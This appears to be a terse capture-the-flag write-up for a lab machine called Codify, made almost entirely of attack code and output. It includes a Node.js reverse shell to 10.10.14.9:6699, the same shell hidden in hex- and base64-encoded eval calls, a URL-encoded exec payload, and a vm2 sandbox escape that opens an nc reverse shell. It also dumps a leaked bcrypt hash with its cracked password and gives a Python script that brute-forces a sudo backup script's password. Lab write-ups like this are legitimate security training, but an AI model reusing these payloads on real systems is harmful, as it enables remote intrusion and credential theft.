NodeJs Exploitation
NodeJs Exploitation to obtain a shell
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.52
3000/tcp open http Node.js Express framework
Service Info: Host: codify.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(6699, "10.10.14.9", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
function(){
eval(String.fromCharCode(28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 6e 65 74 20 3d 20 72 65 71 75 69 72 65 28 22 6e 65 74 22 29 2c 0a 20 20 20 20 20 20 20 20 63 70 20 3d 20 72 65 71 75 69 72 65 28 22 63 68 69 6c 64 5f 70 72 6f 63 65 73 73 22 29 2c 0a 20 20 20 20 20 20 20 20 73 68 20 3d 20 63 70 2e 73 70 61 77 6e 28 22 2f 62 69 6e 2f 73 68 22 2c 20 5b 5d 29 3b 0a 20 20 20 20 76 61 72 20 63 6c 69 65 6e 74 20 3d 20 6e 65 77 20 6e 65 74 2e 53 6f 63 6b 65 74 28 29 3b 0a 20 20 20 20 63 6c 69 65 6e 74 2e 63 6f 6e 6e 65 63 74 28 36 36 39 39 2c 20 22 31 30 2e 31 30 2e 31 34 2e 39 22 2c 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 20 20 63 6c 69 65 6e 74 2e 70 69 70 65 28 73 68 2e 73 74 64 69 6e 29 3b 0a 20 20 20 20 20 20 20 20 73 68 2e 73 74 64 6f 75 74 2e 70 69 70 65 28 63 6c 69 65 6e 74 29 3b 0a 20 20 20 20 20 20 20 20 73 68 2e 73 74 64 65 72 72 2e 70 69 70 65 28 63 6c 69 65 6e 74 29 3b 0a 20 20 20 20 7d 29 3b 0a 20 20 20 20 72 65 74 75 72 6e 20 2f 61 2f 3b 20 2f 2f 20 50 72 65 76 65 6e 74 73 20 74 68 65 20 4e 6f 64 65 2e 6a 73 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 66 72 6f 6d 20 63 72 61 73 68 69 6e 67 0a 7d 29 28 29 3b))}
eval(new Buffer("KGZ1bmN0aW9uKCl7CiAgICB2YXIgbmV0ID0gcmVxdWlyZSgibmV0IiksCiAgICAgICAgY3AgPSByZXF1aXJlKCJjaGlsZF9wcm9jZXNzIiksCiAgICAgICAgc2ggPSBjcC5zcGF3bigiL2Jpbi9zaCIsIFtdKTsKICAgIHZhciBjbGllbnQgPSBuZXcgbmV0LlNvY2tldCgpOwogICAgY2xpZW50LmNvbm5lY3QoNjY5OSwgIjEwLjEwLjE0LjkiLCBmdW5jdGlvbigpewogICAgICAgIGNsaWVudC5waXBlKHNoLnN0ZGluKTsKICAgICAgICBzaC5zdGRvdXQucGlwZShjbGllbnQpOwogICAgICAgIHNoLnN0ZGVyci5waXBlKGNsaWVudCk7CiAgICB9KTsKICAgIHJldHVybiAvYS87IC8vIFByZXZlbnRzIHRoZSBOb2RlLmpzIGFwcGxpY2F0aW9uIGZyb20gY3Jhc2hpbmcKfSkoKTs=","base64").toString("ascii"))
?q=require(%27child_process%27).exec(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.9%2F6699%200%3E%261)
var os = require('os');
var info = os.userInfo([]);
console.log(info.shell);
console.log(info.username);
console.log(info.homedir);
const {VM} = require("vm2");
const vm = new VM();
const code = `
async function fn() {
(function stack() {
new Error().stack;
stack();
})();
}
p = fn();
p.constructor = {
[Symbol.species]: class FakePromise {
constructor(executor) {
executor(
(x) => x,
(err) => { return err.constructor.constructor('return process')().mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.8 6699 >/tmp/f'); }
)
}
}
};
p.then();
`;
console.log(vm.run(code));
Intial Access
There is a sqLite db file in var/www/contact which contains a username and a bcrypt password hash,
on the victim I start a http server
python3 -m http.server
cat tickets.db
�T5��T�format 3@ .WJ
otableticketsticketsCREATE TABLE tickets (id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT, topic TEXT, description TEXT, status TEXT)P++Ytablesqlite_sequencesqlite_sequenceCREATE TABLE sqlite_sequence(name,seq)�� tableusersusersCREATE TABLE users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE,
password TEXT
��G�joshua$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
��
����ua users
ickets
r]r�h%%�Joe WilliamsLocal setup?I use this site lot of the time. Is it possible to set this up locally? Like instead of coming to this site, can I download this and set it up in my own computer? A feature like that would be nice.open� ;�wTom HanksNeed networking modulesI think it would be better if you can implement a way to handle network-based stuff. Would help me out a lot. Thanks!open
Cracking the password with JTR
spongebob1
lets try ssh
ssh joshua@10.10.10.239
User Flag Aquired
import os
import string
charset = string.printable
resfult = ""
def get(i):
temp_hash = os.popen(f"echo '{i}'* | sudo /opt/scripts/mysql-backup.sh").read().split("\n")[1]
return temp_hash == 'Password confirmed!'
def find_char():
for i in charset:
test_data = resfult + i
if get(test_data):
return i
return None
while True:
new_char = find_char()
print(f"pass: {resfult + new_char}")
if not new_char:
break
else:
resfult += new_char